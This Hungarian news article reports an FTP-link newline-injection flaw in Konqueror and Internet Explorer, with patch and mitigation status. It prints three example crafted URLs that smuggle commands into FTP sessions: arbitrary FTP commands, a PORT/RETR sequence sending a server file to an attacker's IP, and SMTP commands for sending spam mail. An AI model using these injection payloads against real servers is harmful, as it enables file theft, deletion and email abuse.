Közös hiba az Explorerben és a Konquerorban

A Linux alapú Konqueror és a Windowsba integrált Internet Explorer (IE) böngészőkben biztonsági kockázatot jelent bizonyos preparált ftp-linkek futtatása. Az ilyen linkekkel parancsok hajthatók végre az ftp-szerveren, sőt lehetséges akár email továbbítása is.

A spammelők felállíthatnak olyan weboldalakat, ahol a felhasználó például tetszőleges képre kattintva valójában emailt továbbít. Az érintett böngészők legfontosabb hiányossága, hogy nem értelmezik megfelelően az url-be kódolt új sor (Newline) jelet (%0a). Így ftp-parancsok csempészhetők a létrejött ftp-kapcsolatba, írta a heise.de híroldal.

A belépés sem akadály

Például:
ftp://ftpuser:ftppass@server/directory%0aftp-parancs%0a

A fenti példában még az sem jelent gondot, hogy a megkövetelik a felhasználó beléptetését, hiszen mindez egy linken belül megoldható. A biztonsági rés felfedezője, Albert Puigsech Galicia szerint ezt követően a szerver tetszőleges parancsokat küldhet, amint a felhasználó össze-vissza kattint az oldalon.

Így például a
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
link arra utasítja a szervert, hogy a rajta tárolt fájlt az a,b,c,d IP-szamú támadóhoz továbbítsa. Ugyanígy nincsen akadálya annak sem, hogy fájlokat töröljenek a parancsokkal.

Indul az email

Mivel az ftp-kommunikáció bizonyos hasonlóságokat mutat az smtp-vel, bizonyos linkekkel az emailek küldése is megoldható.

A példa szerint:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT
TO%3a%0d%0aDATA%0d%0aSubject%3a
hacked%0d%0aTo%3a user%40server%0d%0a%0d%0ahacked
%0d%0a.%0d%0a:victim@domain:25

A hiba Konqueror esetében a december 5., az Explorer esetében december 7. óta ismert. A KDE fejlesztői figyelmeztetést adtak ki, amelyben megadják a Konquerorban használt "FTP kioslave" komponens javításának elérhetőségét. A heise.de szerint a Linux-disztribútorokhoz már a javított KDE-csomagok kerülnek.

Az Explorer esetében még nincs javítás, viszont Windows XP SP2 alatt a hiba már nem aknázható ki. Az XP SP1 felhasználóknak a javítócsomag telepítése ajánlott, mivel ott egy sor további, régen felfedezett hibát is kijavítanak.

A Windows 2000 és az SP2-től elvágott XP felhasználók alternatív böngészők használatával oldhatják meg a problémát.